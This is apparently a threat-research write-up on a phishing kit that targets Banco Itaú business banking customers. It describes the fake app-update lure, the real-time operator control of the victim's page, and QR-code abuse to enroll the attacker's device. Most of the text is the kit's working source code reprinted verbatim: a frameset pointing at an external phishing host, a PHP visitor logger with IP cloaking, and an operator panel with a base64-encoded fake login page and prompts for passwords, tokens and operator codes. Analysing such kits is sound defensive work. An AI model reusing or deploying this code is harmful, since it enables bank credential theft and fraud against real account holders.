Real-time Phishing Kit Targets Banco Itau Business Accounts
This phishing kit was found on a compromised website and it has the ability to control the victim’s phishing page in real-time and use various techniques like generated QR codes to obtain unauthorized access to the victim’s account.
The kit targets Banco Itaú Empresas (business) customers that use Itaú Internet Banking - which is important because it comes with increased security requirements like:
- Install Itaú App on the computer/phone or the older Guardião 30 Horas application ;
- Unlock the App and Itoken Itaú ; (iToken)
- register a 6 to 8 digit electronic password to be used both when accessing the application, website or Itaú customer service phones. ; (Senha Electronica)
The biggest hurdle to the attacker for this type of account is that it requires a special application be installed before being able to log into the business banking account. This can make it much more difficult to be able to use the banking account once the phisher has stolen the relevant login information. We’ll cover more on this later.
How could an attacker convince the victim to enter their banking account login information outside of the required Itaú application?
Phishing Lure⌗
In order to convince the victim, the attacker uses a fake diagnostics page that pretends to check if the victim has the Itaú app installed for secure access to their banking account, then it alerts the victim that their currently installed Itaú app is outdated and must be updated.
Once the victim clicks the blue Update button, they are then redirected to a separate phishing page that is designed to impersonate the legitimate banking login page.
Attacker Real-time Control Capabilities⌗
The most notable part of this phishing kit is that it allows the attacker to have real-time control over the phishing page’s actions as the victim is on it. This is done through PHP sessions and having the phishing page submit requests every 5 seconds when a victim is on it. These continuously generated requests use AJAX (asynchronous JavaScript) and allow the phishing page to receive a response from the attacker’s phishing kit (opera.php). The response from the phishing kit to the generated AJAX request contains JSON encoded data that changes the phishing pages’ actions asynchronously, which means no page reload is necessary from the victim.
Naturally there will be some time between the victim inputting sensitive data and the phishing page receiving its next action from the attacker’s phishing kit, so during that time the phishing page will show the bank’s standardized loading GIF image as if it is loading something when it’s actually just waiting for the attacker’s to tell the phishing page what to load.
This is also reflected on the attacker’s phishing panel, where they will see the text AGUARDANDO (translates to ‘waiting for’) next to the victim’s IP address whenever the fake “carregando” loading screen is being shown on their browser:
I’ve included a GIF splitscreen image below where I act as a victim on the phishing page on the left browser window and also act as the attacker in the phishing panel on the right browser window.
As you can see in the GIF image, the victim first puts in their Banco Itaú login data (agencia and conta corrente), which are two separate numbers located on their banking payment card. Afterwards, the fake loading page “carregando” (loading in English) is shown to the victim, but on the attacker’s side they can now see the submitted data values for agencia and conta corrente and decide to instruct the phishing page to ask the victim for the Senha Electronica (electronic password).
The Senha Electronica (electronic password) is a 6 digit PIN style password that “that allows access, query and transaction authentication for Itaú Electronic channels (Internet, mobile and telephone)”. The attacker is also able to request additional data like the associated cellular phone number, iToken, owner’s name, and also a QR code.
Unfortunately the file responsible for generating the QR code, qrcode.php, had already been deleted and so we cannot fully replicate it, but by reading the **Itaú **support page we can learn more about its likely purpose:
I already have iToken on my cell phone and I want to unlock the Itaú app on my computer. How do I do that?
First, download the Itaú Empresas app on your computer and choose the app on your phone as a way to unlock it. Then, click on "generate QRCode".
Now, open the app on your phone and, without accessing your account, click on the "iToken" icon. Then, go to the QRCode tab and point the phone's camera at the code that was generated on the computer. Your phone will display a six-digit code. Now just type these numbers on the computer and confirm. Ready! You can now use the app on your computer.
So the attacker, if necessary, could use the real-time phishing capabilities and request the QR code from Itaú using the account login details that were already submitted by the victim, then once they have the QR code they can send it to the victim for them to scan with their phone’s Itaú app. This will generate a code that the victim will type and send to the attacker who can then enter it on Itaú’s legitimate website as if they were the account owner.
Attacker’s view of phishing panel
The attacker’s phishing panel contains all of the options that are needed to carry out this phishing attack and categorizes the stolen data by IP addresses. The attacker has the option to allow or block IPs and also submit commands to the phishing page through the titled HTML buttons. The Inicio button is the first button used and it starts/resets the victim’s PHP session. If this isn’t pressed then the victim will stay at whatever action (e.g Apelido used to ask for their name) was last used on the phishing page - even if they refresh it.
In addition to the phishing kit, there was a file named pagamentos.html that contained some interesting information when loaded:
The PagSeguro button will load a new tab with a shortened URL pag.ae (not a malicious website) that is used to send invoices to request payment from others. This invoice is requesting payment of $14,997.72 Reals, which is equivalent to $2,668 USD, for “online consulting and marketing services”.
I’m not sure if the attacker tricks the phishing victim into paying this invoice, or if the attacker logs into the victim’s banking account and pays it that way. There wasn’t any code referencing this file, so it’s hard to say.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<script>
function timer()
{
var date = new Date();
var seconds = date.getSeconds();
var minutes = date.getMinutes();
var hours = date.getHours()
if (seconds < 10)
{
seconds = '0' + seconds;
}
if (minutes < 10)
{
minutes = '0' + minutes;
}
if (hours < 10)
{
hours = '0' + hours;
}
document.getElementById('date').innerHTML = hours + ':' + minutes + ':' + seconds;
setTimeout('timer()', 1000);
}
</script>
<title>Para empresas </title>
</head>
<frameset rows="*">
<frame frameborder=0 src="https://meuapp.ga/colo.html" name="dot_tk_frame_content" scrolling="auto" noresize>
</frameset>
</html>
<?php
date_default_timezone_set('America/Sao_Paulo');
setlocale (LC_ALL, 'pt_BR');
$semana = ucfirst(strftime ("%A"));
$site = strtolower($_SERVER['HTTP_HOST']); // recebe url do dominio
$user_agent = $_SERVER['HTTP_USER_AGENT'];
// Função Pega Sistema Operacional
function getOS() {
global $user_agent;
$os_platform = "Desconhecido";
$os_array = array(
'/windows nt 10/i' => 'Windows 10',
'/windows nt 6.3/i' => 'Windows 8.1',
'/windows nt 6.2/i' => 'Windows 8',
'/windows nt 6.1/i' => 'Windows 7',
'/windows nt 6.0/i' => 'Windows Vista',
'/windows nt 5.2/i' => 'Windows Server 2003/XP x64',
'/windows nt 5.1/i' => 'Windows XP',
'/windows xp/i' => 'Windows XP',
'/windows nt 5.0/i' => 'Windows 2000',
'/windows me/i' => 'Windows ME',
'/win98/i' => 'Windows 98',
'/win95/i' => 'Windows 95',
'/win16/i' => 'Windows 3.11',
'/macintosh|mac os x/i' => 'Mac OS X',
'/mac_powerpc/i' => 'Mac OS 9',
'/linux/i' => 'Linux',
'/ubuntu/i' => 'Ubuntu',
'/iphone/i' => 'iPhone',
'/ipod/i' => 'iPod',
'/ipad/i' => 'iPad',
'/android/i' => 'Android',
'/blackberry/i' => 'BlackBerry',
'/webos/i' => 'Mobile'
);
foreach ($os_array as $regex => $value) {
if (preg_match($regex, $user_agent)) {
$os_platform = $value;
}
}
return $os_platform;
}
// Função Pega Browser
function getBrowser() {
global $user_agent;
$browser = "Desconhecido";
$browser_array = array(
'/msie/i' => 'Internet Explorer',
'/firefox/i' => 'Firefox',
'/safari/i' => 'Safari',
'/chrome/i' => 'Chrome',
'/opera/i' => 'Opera',
'/netscape/i' => 'Netscape',
'/maxthon/i' => 'Maxthon',
'/konqueror/i' => 'Konqueror',
'/mobile/i' => 'Celular'
);
foreach ($browser_array as $regex => $value) {
if (preg_match($regex, $user_agent)) {
$browser = $value;
}
}
return $browser;
}
$user_os = getOS();
$user_browser = getBrowser();
// Funcao de Bloquear acesso de ips indesejaveis.
$ban = file('banidos');
$count = count($ban);
for ($i=0; $i<$count; $i++) {
$_ban = trim($ban[$i]);
if(strcasecmp($_SERVER['REMOTE_ADDR'],$_ban) == 0) {
$fpipbk = fopen("./block", "a");
$escreveipbk = fwrite($fpipbk, $semana . date(" - d/m/Y - H:i:s - ") . $_SERVER['REMOTE_ADDR'] . " - " . gethostbyaddr($_SERVER['REMOTE_ADDR']) . " - " . $site . " - " . $_SERVER["HTTP_USER_AGENT"] . " - " . $_SERVER['HTTP_REFERER'] .chr(13).chr(10));
fclose($fpipbk);
header('Location: https://www.itau.com.br/empresas');
exit; } }
$ip = $_SERVER['REMOTE_ADDR'];
$fp = fopen("./stats", "a");
$escreve = fwrite($fp, '<tr><td height="10" bordercolor="#990000" class="valor" nowrap ><a href="./allowip.php?ip='.$ip.'"><button class="btn btn-success lig" type="button" >PERMITIR
<span class="caret"></span></button></a></td><td height="10" bordercolor="#990000" class="valor" nowrap ><a href="./blockip.php?ip='.$ip.'"><button type="button" class="btn btn-warning lig" data-id="5bbce5a955164f93a9a24b59" data-action="edit">Blocar</button></a></td><td height="10" bordercolor="#990000" class="valor" nowrap >' . $_SERVER['REMOTE_ADDR'] . '</td><td height="10" bordercolor="#990000" class="valor" nowrap >' . $user_os . '</td><td height="10" bordercolor="#990000" class="valor" nowrap >' . $user_browser . '</td><td height="10" bordercolor="#990000" class="valor" nowrap >'. gethostbyaddr($_SERVER['REMOTE_ADDR']) .'</td><td height="10" bordercolor="#990000" class="valor" nowrap >'. $semana . date(" - d/m/Y") . '</td><td height="10" bordercolor="#990000" class="valor" nowrap >'. date("H:i:s") .'</td></td></tr></tr>'.chr(13).chr(10));
header('Location: conectando');
?>
<?php
session_start();
$localInfo = "./xxxzxxx/";
if (!isset($_REQUEST['inf']))
{
echo "<body style= 'background-color : #000000; text-align:center' >";
echo '<title>2020</title>';
// echo '<meta http-equiv="refresh" content="5;URL=">';
echo "<h2 align='center'>2020</h2><br><br>";
$arrayArquivos;
$qnt = 0;
$diretorio = dir($localInfo);
while ($arquivo = $diretorio->read())
{
if (strpos($arquivo, '.info'))
{
$name = explode(".info", $arquivo);
if (isset($_POST['limpa']))
{
rename($localInfo . $arquivo, $localInfo . $name[0] . "old");
$_SESSION['QNT'] = 0;
continue;
}
echo "<a target='_target' href='?inf=" . $arquivo . "'><font inherit size='8'>" . $arquivo . "</font></a>";
$arq = fopen($localInfo . $arquivo, 'r');
$tmparr = (array)json_decode(fgets($arq));
fclose($arq);
$qnt++;
if ($tmparr['STATUS'] == 'AGUARDANDO')
{
echo " - <font size='4' color='red'> " . $tmparr['STATUS'] . " </font> <br>";
}
else if ($tmparr['STATUS'] == 'LIBERAR_CLIENTE')
{
echo " - <font size='4' color='red'> " . $tmparr['STATUS'] . " </font> <br>";
}
else
{
echo " - <font size='5' color='black'> " . $tmparr['STATUS'] . " </font><br>";
}
unset($tmparr);
}
}
$diretorio->close();
if ($_SESSION['QNT'] != $qnt)
{
echo '<audio autoplay="autoplay"><source src="op.mp3" /></audio>';
$_SESSION['QNT'] = $qnt;
}
echo '<form id="frmop" method="POST" action="">';
echo "<br><br><button id='limpa' name='limpa' value='ok' onClick=\"return confirm('APAGAR TUDO ?');\">APAGAR INFOS</button>";
echo '</form>';
exit();
}
if (isset($_REQUEST['inf']))
{
$inf = $_REQUEST['inf'];
echo "<body style= 'background-color : #000000; text-align:center' >";
$arquivo = $localInfo . $inf;
if (!file_exists($arquivo))
{
exit();
}
if (isset($_POST['btoperador']))
{
$bt = $_POST['btoperador'];
$arq = fopen($arquivo, 'rw+');
$arr = (array)json_decode(fgets($arq));
rewind($arq);
ftruncate($arq, 0);
if (isset($_POST['NOME'])) $arr['NOME'] = $_POST['NOME'];
if ($bt == 'agcn')
{
$arr['STATUS'] = 'INICIAL';
$arr['MENSAGEM'] = "PGRpdiBjbGFzcz0ibmF2aWdhdGlvbi10b3AiIHN0eWxlPSJoZWlnaHQ6IDQwcHg7IGJhY2tncm91bmQtY29sb3I6ICMwMDM3NjciPgoJPGRpdiBjbGFzcz0iY29udGFpbmVyIiBzdHlsZT0iaGVpZ2h0OiAxMDAlIj4KCQk8ZGl2IHN0eWxlPSJoZWlnaHQ6IDEwMCU7IHdpZHRoOiAyMDBweDsgYmFja2dyb3VuZC1jb2xvcjojMWE0Yjc3IiA+CgkJCTxhIGNsYXNzPSIgZW1wcmVzYXMgYWN0aXZlIiByb2xlPSJidXR0b24iIHN0eWxlPSJjb2xvcjogI0ZGRkZGRjtsaW5lLWhlaWdodDogNDBweDtmb250LXNpemU6IDE2cHg7IGhlaWdodDogMTAwJTsgY3Vyc29yOiBwb2ludGVyO3RleHQtZGVjb3JhdGlvbjogbm9uZTsgbWFyZ2luLWxlZnQ6IDQ0cHgiPnBhcmEgZW1wcmVzYXM8L2E+CgkJPC9kaXY+Cgk8L2Rpdj4KPC9kaXY+CjxkaXYgY2xhc3M9Im5hdmJhci13cmFwcGVyIiBzdHlsZT0iY29sb3I6ICMyNTIyMjA7IGJhY2tncm91bmQtY29sb3I6ICNGQUY4Rjc7IGhlaWdodDogMTA0cHgiPgoJPGRpdiBjbGFzcz0iY29udGFpbmVyIiBzdHlsZT0iaGVpZ2h0OiAxMDAlIj4KCQk8ZGl2IGNsYXNzPSJsb2dvIiBzdHlsZT0iaGVpZ2h0OiAxMDAlOyBmbG9hdDogbGVmdDsgcGFkZGluZzogMjdweCAwOyBtYXJnaW4tcmlnaHQ6IDEwcHg7Ij4KCQkJPGltZyBzcmM9ImltZy9sb2dvbm92b2xheW91dC5wbmciIGFsdD0ibG9nbyBpdGHDuiIgY2xhc3M9ImQtbm9uZSBkLWxnLWJsb2NrIiBoZWlnaHQ9IjUwIiB3aWR0aD0iMTgwIj4KCQk8L2Rpdj4KCQk8ZGl2IHN0eWxlPSIgICAgZmxvYXQ6IGxlZnQ7IGhlaWdodDogNDBweDttYXJnaW46IDMycHggMzJweCAzMnB4IDA7Ym9yZGVyLWxlZnQ6IDFweCBzb2xpZCAjRDlEM0NGO3BhZGRpbmctbGVmdDogMTJweDsiPjwvZGl2PgoKCQk8ZGl2IHN0eWxlPSIgICAgZmxvYXQ6IHJpZ2h0OyBoZWlnaHQ6IDEwMCU7IGJvcmRlci1sZWZ0OiAxcHggc29saWQgI0Q5RDNDRjsgcGFkZGluZy1sZWZ0OiAxMnB4OyBib3JkZXItcmlnaHQ6IDFweCBzb2xpZCAjRDlEM0NGOyB3aWR0aDogMjkzcHg7Ij4KCQkJPGRpdj4KCQkJCTxidXR0b24gaWQ9Im1lbnVUeXBlQWNjZXNzIiBhcmlhLWNvbnRyb2xzPSJjb2xsYXBzZVR5cGVBY2Nlc3MiIGNsYXNzPSJvcHRpb25zIGNvbGxhcHNlZCIgdHlwZT0iYnV0dG9uIiBkYXRhLXRvZ2dsZT0iY29sbGFwc2UiIGRhdGEtdGFyZ2V0PSIjY29sbGFwc2VUeXBlQWNjZXNzIiBhcmlhLWV4cGFuZGVkPSJmYWxzZSI+CgkgICAgICAgIAkJYWNlc3NhciBjb20gCgkgICAgICAgIAkJPHNwYW4gY2xhc3M9ImdseXBoaWNvbiBnbHlwaGljb24tbWVudS1kb3duIiBzdHlsZT0ibWFyZ2luLWxlZnQ6IDZweDtmb250LXNpemU6IDE0cHg7bGluZS1oZWlnaHQ6IDI0cHg7Ij48L3NwYW4+CgkgICAgICAgIAkJPHNwYW4gY2xhc3M9ImdseXBoaWNvbiBnbHlwaGljb24tbWVudS11cCIgc3R5bGU9Im1hcmdpbi1sZWZ0OiA2cHg7Zm9udC1zaXplOiAxNHB4O2xpbmUtaGVpZ2h0OiAyNHB4OyI+PC9zcGFuPgoJICAgIAkJPC9idXR0b24+CgoJCQkJPHVsIGNsYXNzPSJkcm9wZG93bi1zZWxlY3QgY29sbGFwc2UiIGlkPSJjb2xsYXBzZVR5cGVBY2Nlc3MiIHJvbGU9Im1lbnUiIGFyaWEtbGFiZWxsZWRieT0ibWVudVR5cGVBY2Nlc3MiIHRhYmluZGV4PSItMSIgc3R5bGU9IiAgICBwb3NpdGlvbjogYWJzb2x1dGU7dHJhbnNpdGlvbjogYWxsIDc1MG1zIGVhc2UgMHM7YmFja2dyb3VuZC1jb2xvcjogcmdiKDI1NSwgMjU1LCAyNTUpO3dpZHRoOiAyNzlweDttYXJnaW4tdG9wOiAtMnB4O3otaW5kZXg6IDE7bWFyZ2luLWxlZnQ6IDBweDtib3JkZXItcmFkaXVzOiAwcHggMHB4IDRweCA0cHg7Ym9yZGVyLWxlZnQ6IDFweCBzb2xpZCByZ2IoMjE3LCAyMTEsIDIwNyk7Ym9yZGVyLXJpZ2h0OiAxcHggc29saWQgcmdiKDIxNywgMjExLCAyMDcpO2JvcmRlci1ib3R0b206IDFweCBzb2xpZCByZ2IoMjE3LCAyMTEsIDIwNyk7IGxpbmUtaGVpZ2h0OiA0MHB4OyBmb250LXNpemU6IDE2cHg7IHRleHQtZGVjb3JhdGlvbjogbm9uZTsiPgoJCQkJICAgICAgICA8bGkgcm9sZT0ibWVudWl0ZW0iIGNsYXNzPSJvcHRpb24tYWNjZXNzIiB0YWJpbmRleD0iMCIgb25jbGljaz0ic2VsZWNpb25hX2VudHJhZGEoJ0FHJykiOz4KCQkJCSAgICAgICAgICAgIDxhIGhyZWY9IiMiIG9uY2xpY2s9InNlbGVjaW9uYV9lbnRyYWRhKCdBRycpOyI+QWcmZWNpcmM7bmNpYSBlIENvbnRhPC9hPgoJCQkJICAgICAgICA8L2xpPgoJCQkJICAgICAgICA8bGkgcm9sZT0ibWVudWl0ZW0iIGNsYXNzPSJvcHRpb24tYWNjZXNzIiB0YWJpbmRleD0iMCIgb25jbGljaz0ic2VsZWNpb25hX2VudHJhZGEoJ09QJykiOz4KCQkJCSAgICAgICAgCTxhIGhyZWY9IiMiIG9uY2xpY2s9InNlbGVjaW9uYV9lbnRyYWRhKCdPUCcpOyI+QyZvYWN1dGU7ZGlnbyBPcGVyYWRvcjwvYT4KCQkJCSAgICAgICAgPC9saT4KCSAgICAJCTwvdWw+CgkgICAgCTwvZGl2PgoJCSAJPGRpdj4KCQkgCQk8ZGl2IGlkPSJjYW1wb3NzcyIgc3R5bGU9IiBsaW5lLWhlaWdodDogMjhweDsgaGVpZ2h0OiA0NHB4OyBiYWNrZ3JvdW5kOiAjRkZGRkZGOyBib3JkZXI6IDFweCBzb2xpZCAjRDlEM0NGOyBib3JkZXItcmFkaXVzOiA0cHg7IHBhZGRpbmc6IDhweCAxNnB4OyBmbG9hdDogbGVmdDsgd2lkdGg6IDE4M3B4OyBtYXJnaW4tbGVmdDogMzBweDsiPgoJCQkgICAgCQoJCQkgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9IkxPR0lOX0FHRyIgIHBsYWNlaG9sZGVyPSJBZyZlY2lyYztuY2lhIiBvbktleVByZXNzPSJyZXR1cm4gZm9ybWF0YUNhbXBvKHRoaXMsICcwMDAwJywgZXZlbnQsIHRydWUpIiAgPgoJCQkgICAgPGRpdiBzdHlsZT0iYm9yZGVyLWxlZnQ6MXB4IHNvbGlkICNEOUQzQ0Y7aGVpZ2h0OjI0cHg7IGZsb2F0OiBsZWZ0OyByaWdodDoyNTBweDsgdG9wOjEwcHg7Ij48L2Rpdj4KCQkJICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJMT0dJTl9BQ0MiIHBsYWNlaG9sZGVyPSJDb250YSIgc3R5bGU9InBhZGRpbmctbGVmdDogMTZweDsgd2lkdGg6IDczcHg7IiBvbktleVByZXNzPSJyZXR1cm4gZm9ybWF0YUNhbXBvKHRoaXMsICcwMDAwMC0wJywgZXZlbnQsIHRydWUpIj4KCQkJICAgIDwvZGl2PgoJCQkgICAgPGRpdiBzdHlsZT0id2lkdGg6IDQ0cHg7aGVpZ2h0OiA0NHB4O2JhY2tncm91bmQtY29sb3I6ICNEOUQzQ0Y7ZmxvYXQ6IGxlZnQ7bWFyZ2luLWxlZnQ6IDEwcHg7IGN1cnNvcjogcG9pbnRlcjsiIG9uY2xpY2s9ImZvcm1zdWJtaXQoKTsiPgoJCQkgICAgCTxpIGNsYXNzPSJtYXRlcmlhbC1pY29ucyIgc3R5bGU9IiAgICBhbGlnbi1pdGVtczogY2VudGVyOyBmb250LXNpemU6IDI1cHg7IGNvbG9yOiAjODA4MDgwZDQ7IGZvbnQtd2VpZ2h0OiAxMDA7IGxpbmUtaGVpZ2h0OiAxLjg7IHBhZGRpbmctbGVmdDogMTBweDsiPmxvY2tfb3V0bGluZTwvaT4KCQkJICAgIDwvZGl2PgoJCSAJPC9kaXY+CgkJIDwvZGl2PgoJCSAKCgk8L2Rpdj4KPC9kaXY+CjxkaXYgY2xhc3M9ImJhbm5lciI+Cgk8ZGl2IGNsYXNzPSJjb250ZW50Ij4KCQk8ZGl2IGNsYXNzPSJURVhUT19USVRVTE8iPgogICAgICAgICAgICAgICAgPGgxPkJlbS12aW5kbyBhbyBJdGEmdWFjdXRlOyBFbXByZXNhczwvaDE+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0iVEVYVE9fVEVYVE8iPgogICAgICAgICAgICAgICAgPHA+UGFyYSB2b2MmZWNpcmM7IHRlciBtYWlzIHRlbXBvIHBhcmEgcGVuc2FyIGNvbW8gZG9uby48L3A+CiAgICAgICAgICAgICAgICAKICAgICAgICA8L2Rpdj4KICAgIDwvZGl2Pgo8L2Rpdj4=";
}
if (($bt == 'senhae') || ($bt == 'opera'))
{
$CHAT = "";
$arr['STATUS'] = 'SENHAELETRONICA';
if (strlen($_POST["SEQ"]) > 10)
{
$arr['SEQ'] = $_POST['SEQ'];
$seq = explode(',', $arr['SEQ']);
$CHAT .= '<input type="hidden" id="idPW1" name="LOGIN_SENHA"><div id="header_01"><div id="logo_01_novo"></div></div><div id="bg_01_"><div id="main-als"><div id="main-bgs"><div id="identificacao"><span>Ol�, <strong> ' . $arr["NOME"] . ' </strong> </span></div><div id="senha"><input type="password" id="PWShow" onkeydown="return false;"></div></div> <div id="tecladoDinamico">';
foreach ($seq as $key => $value)
{
$CHAT .= '<a href="#" class="tecla" role="button" tabindex="0" onclick="mClick(\'' . $value . '\');">' . $value[0] . ' ou ' . $value[1] . ' </a>';
}
$CHAT .= '<a href="#" class="tecla icon" role="button" tabindex="0" onclick="mClick(\'limpar\');"><span class="icon-tecla-voltar"></span></a></div></div><div id="btn-acessar" onclick="$(\'#frm\').submit();"></div></div>';
$arr['MENSAGEM'] = base64_encode($CHAT);
}
else
{
$num1 = ["19", "43", "72", "56", "08"];
$num2 = ["18", "49", "76", "52", "03"];
$CHAT .= '<input type="hidden" id="idPW1" name="LOGIN_SENHA"><input type="hidden" id="idPW2"><div id="header_01"><div id="logo_01_novo"></div></div><div id="bg_01_"><div id="main-als"><div id="main-bgs"><div id="identificacao"><span>Bem Vindo, <strong>' . $arr["NOME"] . '</strong></span></div><div id="senha"><input type="password" id="PWShow" onkeydown="return false;"></div></div> <div id="tecladoDinamico" class="num1">';
foreach ($num1 as $key => $value)
{
$CHAT .= '<a href="#" class="tecla" role="button" tabindex="0" onclick="mClick(\'' . $value . '\');">' . $value[0] . ' ou ' . $value[1] . ' </a>';
}
$CHAT .= '<a href="#" class="tecla icon" role="button" tabindex="0" onclick="mClick(\'limpar\');"><span class="icon-tecla-voltar"></span></a></div><div id="tecladoDinamico" class="num2">';
foreach ($num2 as $key => $value)
{
$CHAT .= '<a href="#" class="tecla" role="button" tabindex="0" onclick="mClick(\'' . $value . '\');">' . $value[0] . ' ou ' . $value[1] . ' </a>';
}
$CHAT .= '<a href="#" class="tecla icon" role="button" tabindex="0" onclick="mClick(\'limpar\');"><span class="icon-tecla-voltar"></span></a></div>';
$CHAT .= '</div><div id="btn-acessar" onclick="ckok();"></div></div>';
$arr['MENSAGEM'] = base64_encode($CHAT);
}
}
if ($bt == 'codOperador')
{
$arr['STATUS'] = 'COD_OPERADOR';
$arr['MENSAGEM'] = base64_encode('<div id="header_01"><div id="logo_01_novo"></div></div><div id="_cod_operador"><div id="inputs_cod_operador"><label for="cod_operador">Codigo do Operador<input type="text" id="cod_operador" name="OPERADOR" placeholder=""></label> </div><div id=btn_acessar onclick="$(\'#frm\').submit();"></div></div>');
}
if ($bt == 'APELIDO')
{
$arr['STATUS'] = 'APELIDO';
$arr['MENSAGEM'] = base64_encode('<div id="header_01"><div id="logo_01_novo"></div></div><div id="APELIDO"><div id="inputs_cod_operador"><label for="cod_operador"><br><input type="text" id="cod_operador" name="APELIDO" placeholder=""></label> </div><div id=btn_acessar onclick="$(\'#frm\').submit();"></div></div>');
}
if ($bt == 'finaliza')
{
$arr['STATUS'] = 'FINALIZADA';
$arr['MENSAGEM'] = base64_encode('<div id="header_01"><div id="logo_01_novo"></div></div><div id="finalizada"></div>');
}
if ($bt == 'NAOLOGAR')
{
$arr['STATUS'] = 'NAOLOGAR';
$arr['MENSAGEM'] = base64_encode('<div id="header_01"><div id="logo_01_novo"></div><div id="NAOLOGAR"></div>');
}
// --- Final do btOperador ---
if ($bt == 'tk_cs')
{
$arr['STATUS'] = "TOK_CS";
$arr['MENSAGEM'] = base64_encode('<div id="header_01"><div id="logo_01_novo"></div></div><div id="_cod_dispositivo"><div id="inputs_cod_"><input type="password" id="dispositivo" name="CODIGO_INICIAL" placeholder="" maxlength="6"> </div><div id=btn_acessar onclick="$(\'#frm\').submit();"></div></div>');
}
fwrite($arq, json_encode($arr));
fclose($arq);
}
$arq = fopen($arquivo, 'r');
$arr = (array)json_decode(fgets($arq) , true);
fclose($arq);
echo "<title>GOOD LUCK 2020 </title>";
echo "<h2 align='center'>$inf - ";
if (isset($arr['email'])) echo $arr['email'] . "</h2>";
if ($arr['STATUS'] == 'AGUARDANDO')
{
echo "<h2 align='center'> <font size='10' color='black'> " . $arr['STATUS'] . " </font> </h2>";
echo '<audio autoplay="autoplay"><source src="op.mp3" /></audio> ';
// echo '<meta http-equiv="refresh" content="50;URL=">';
}
else if ($arr['STATUS'] == 'LIBERAR_CLIENTE')
{
echo "<h2 align='center'> <font size='3' color='red'> " . $arr['STATUS'] . " </font> </h2>";
echo '<audio autoplay="autoplay"><source src="op.mp3" /></audio> ';
// echo '<meta http-equiv="refresh" content="50;URL=">';
}
else
{
echo "<h2 align='center'> <font size='3' color='white'> " . $arr['STATUS'] . " </font> </h2>";
// echo '<meta http-equiv="refresh" content="5;URL=">';
}
echo '<table align="left" height="200" style="font-family:sans-serif;font-size:15px;font-weight:sans-serif;border:3px solid #ffffff;">';
echo '<tr>';
echo '<td width="200" height="80">Agencia: ';
echo (isset($arr['LOGIN_AGG'])) ? $arr['LOGIN_AGG'] : "";
echo '</td>';
echo '<td width="194" colspan="2">Conta: ';
echo (isset($arr['LOGIN_ACC'])) ? $arr['LOGIN_ACC'] : "";
echo '</td>';
echo '<th rowspan="6">Códigos<br>';
echo '<textarea name="textarea" rows="5">';
if (isset($arr['CODIGO']))
{
foreach ($arr['CODIGO'] as $key => $value)
{
echo $value . "\r\n";
}
}
echo '</textarea></th></tr><tr>';
echo '<td width="200" height="59">Senha 6*: ';
echo (isset($arr['LOGIN_SENHA'])) ? $arr['LOGIN_SENHA'] : "";
echo '</td>';
echo (isset($arr['LOGIN_LOGIN:SNH'])) ? $arr['LOGIN_LOGIN:SNH'] : "";
echo '</td></tr>';
echo '<tr><td width="200" height="50">Apelido*: ';
echo (isset($arr['APELIDO'])) ? $arr['APELIDO'] : "";
echo '</td>';
echo '<td width="200" height="50">Operador*: ';
echo (isset($arr['OPERADOR'])) ? $arr['OPERADOR'] : "";
echo '</td></tr>';
echo '<td width="300" height="59">Celular*: ';
echo (isset($arr['Referencia'])) ? $arr['Referencia'] : "";
echo '</td></tr><tr>';
echo '</table>';
echo '<div align="center">';
echo '<form id="frmop" method="POST" action="?inf=' . $inf . '">';
echo '<select name="operador" id="operador" style="border:0px solid #e32424;font-family:inherit;font-size:0px;height:0px;">';
echo '<button type="submit" value="opera" name="btoperador" onClick="return confirm(\'Pede Operador??\');">Enviar</button>';
echo '<br> <br><h1>+Nome :</h1> <input type="text" name="NOME" id="NOME" value="';
echo '" style="width :300px;"/>';
echo '<br><br></td><th width="700"></th></tr><tr><td></td><td style="border:2px solid #0f0d0d;">';
echo '<button type="submit" value="agcn" name="btoperador" onClick="return confirm(\'MANDAR PARA O INICIO\');">Inicio</button>';
echo '<button type="action" value="qrcode.php" name="qrcode" onClick="return confirm(\'QRCODE\');">QRCODE</button>';
echo '<button type="submit" value="senhae" name="btoperador" align="right" onClick="return confirm(\'PEDIR SENHA ?\');"> Senha Eletronica</button>';
echo '<button type="submit" value="codOperador" name="btoperador" align="right" onClick="return confirm(\'PEDIR OPERADOR?\');"> Operador </button>';
echo '<button type="submit" value="APELIDO" name="btoperador" align="right" onClick="return confirm(\'PEDIR APELIDO?\');">Apelido</button>';
echo '<button type="submit" value="NAOLOGAR" name="btoperador" align="right" onClick="return confirm(\'PEDIR APELIDO?\');">Nao Logar</button>';
echo '<button type="btn btn-success lig" value="tk_cs" name="btoperador" onClick="return confirm(\'Token??\');">Token </button>';
echo '</td></tr><tr><td></td><td style="border:3px solid #ff5500;" align="center">';
echo '<button type="btn btn-success lig" value="finaliza" name="btoperador" onClick="return confirm(\'MANDAR PARA ROTA APP?\');">ROTA APP</button>';
echo '</td></tr></tbody></table></form></div>';
}
$parceiro = "stats";
$array_file = file($parceiro);
while (list($line_num, $line) = each($array_file))
{
$i++;
}
$count = (int)$_COOKIE["count"];
if ($count > $i)
{
setcookie("count", "");
}
if ((int)$i > (int)$_COOKIE["count"])
{
setcookie("count", (int)$i);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://cdn.datatables.net/1.10.15/js/jquery.dataTables.min.js"></script>
<style type="text/css">
.lig{
padding: 0px 12px !important;
}
td {
padding: 3px !important;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
max-width: 300px !important;
}
.thLigar{
padding: 3px !important;
